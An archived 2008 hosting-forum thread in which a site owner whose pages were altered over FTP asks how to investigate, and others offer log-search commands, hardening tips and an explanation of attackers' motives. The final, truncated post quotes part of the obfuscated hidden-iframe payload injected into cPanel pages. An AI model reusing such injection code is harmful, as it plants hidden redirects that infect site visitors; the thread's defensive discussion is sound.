Questions? Start a Support Ticket
User Registration
Customer Login

Knowledgebase

Portal Home > Knowledgebase > Articles Database > server intrusion: quick fixes & what to do


server intrusion: quick fixes & what to do




Posted by aradulescu246, 11-07-2008, 08:08 AM
server intrusion: quick fixes
Posted by zzhosting, 11-07-2008, 09:05 AM
Hi If they got in via FTP then let the user know and change the password. It sounds like the password was guessed or got some otherway, If you have a billing system that stores user details, check to see if that ip appears anywhere in the billing system logs. You could report the hacker by find the owner of the ip and send an email to the abuse contact email address for that ip block(can find this by doing a whois on the ip in question). This in my experiance doesnt lead to anything.. Hope that helps
Posted by aradulescu246, 11-07-2008, 10:01 AM
I already changed passwords for all accounts. What I found strange is that they added encoded JavaScript to the end of PHP/HTML each page. Can I suppose any purpose based on this behavior pattern? I think that if somebody wanted to steal database - which is most valuable for this site, would have simply added some script to export it, or simply accessed cpanel directly.
Posted by zzhosting, 11-07-2008, 10:14 AM
Sounds like a random attack / PHP exploit in that case. Is the software upto date ? are the permissions ok on the PHP scripts ie not 777 ? Does seem strange that they only did that, but then what goes through a hackers mind is beyond me also...
Posted by aradulescu246, 11-07-2008, 10:44 AM
yep indeed, it's an exploit that was redirecting to a malware site. scripts are not 777, but register_global is on. it is possible to get account password only using register_global based exploits?
Posted by JulesR, 11-07-2008, 12:50 PM
Why oh why do people insist on attempting to debug server intrusions themselves, when they don't know how? Hire a professional before you waste further time on this forum trying to "learn", when your immediate priority should be resolving the situation and closing the hole. I mean no offence here, just that this isn't something you should take lightly and expect to be able to hone your server administration skills over. Your customers data is at risk here, do the right thing. __________________ Which web host? this* - quality web hosting that doesn't oversell Because this* is what we do.
Posted by sabarishks, 11-07-2008, 05:51 PM
Quote: Originally Posted by aradulescu246 I just got an intrusion in one of my websites that are hosted on a dedicated server. I do not know the nature of the attack, only that a javascript coded portion was added to all PHP/HTML pages. What are the steps I should take to find where the attack came from? So far I checked FTP logs and found most likely the IP of the attacker. I also suspect it did not get root access since it used FTP to change the pages. Any advice is appreciated. Also is there some way I can decode the Javascript it used so I can see what it was doing? This is I-Frame attack. The better solution will be to change the FTP port to a non-standard one. Also, try to make the passwords more stronger.
Posted by sabarishks, 11-07-2008, 05:54 PM
grep index /var/log/messages | grep pure-ftpd|awk '{print $6}'|tr '()' ' '|tr '@' ' - '|sort -n|uniq -c|sort -n Use this command to track the culprit.
Posted by aradulescu246, 11-14-2008, 10:32 AM
I took this solution: blocked ftp access from restricted IPs only and also changed passwords to all accounts. I am thinking to implement SFTP also I did a search in logs after the IP and found only 2 websites were affected. Thanks to all people that posted helpful comments.
Posted by hummingbirdhosting, 11-14-2008, 10:48 AM
Hi SFTP will open your server up even more. as you will also be allowing people to SSH to your server. IMO that would be worse than you currently have, unless of course you already allow SSH access. Thanks
Posted by bear, 11-14-2008, 10:58 AM
Quote: Originally Posted by hummingbirdhosting SFTP will open your server up even more. as you will also be allowing people to SSH to your server. IMO that would be worse than you currently have, unless of course you already allow SSH access. "SFTP is not FTP run over SSH"http://en.wikipedia.org/wiki/SSH_file_transfer_protocol __________________Did you know WHT has rules and a help desk?%20, The Final Frontier
Posted by WeWatch, 11-16-2008, 09:22 PM
If you still want the javascript decoded, please PM me or post it here and I'll decode it for you. If the logs show that they got in via FTP then they either used a password cracker/brute forcer, or they infected someone's PC that has FTP access to these sites and installed a keyboard logger and just waited until they logged in. Hackers/crackers/cybercriminals to this to make money. They probably put the code at the bottom of your page in an attempt to hide it from you. They make money by redirecting traffic to their pharmacy sites, or by infecting PCs, taking control of them and then installing pay per install software for which they get paid per each install. When they control a computer, they can do whatever they want with it. They don't hack just for fun or just to annoy you. They hack for a profit. If you have a highly trafficked site, they could use your popularity to increase the SE rankings on their sites with some strong links. I'd be real anxious to decode that javascript. That might provide more clues as to their real motivation. Let me know... __________________ Thomas J. Raef WeWatchYourWebsite - so you don't have to!Report: How Cybercriminals Use Your Website to Deliver Their Malware
Posted by mali, 11-17-2008, 04:15 AM
I am using Cpanel on Centos4.Todai i got Iframe Injection on all Cpanel 00usbggpl/do0pvu/qiq#!xjeui>2!ifjhiu>2!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?"; var result = ""; for(var i=0;i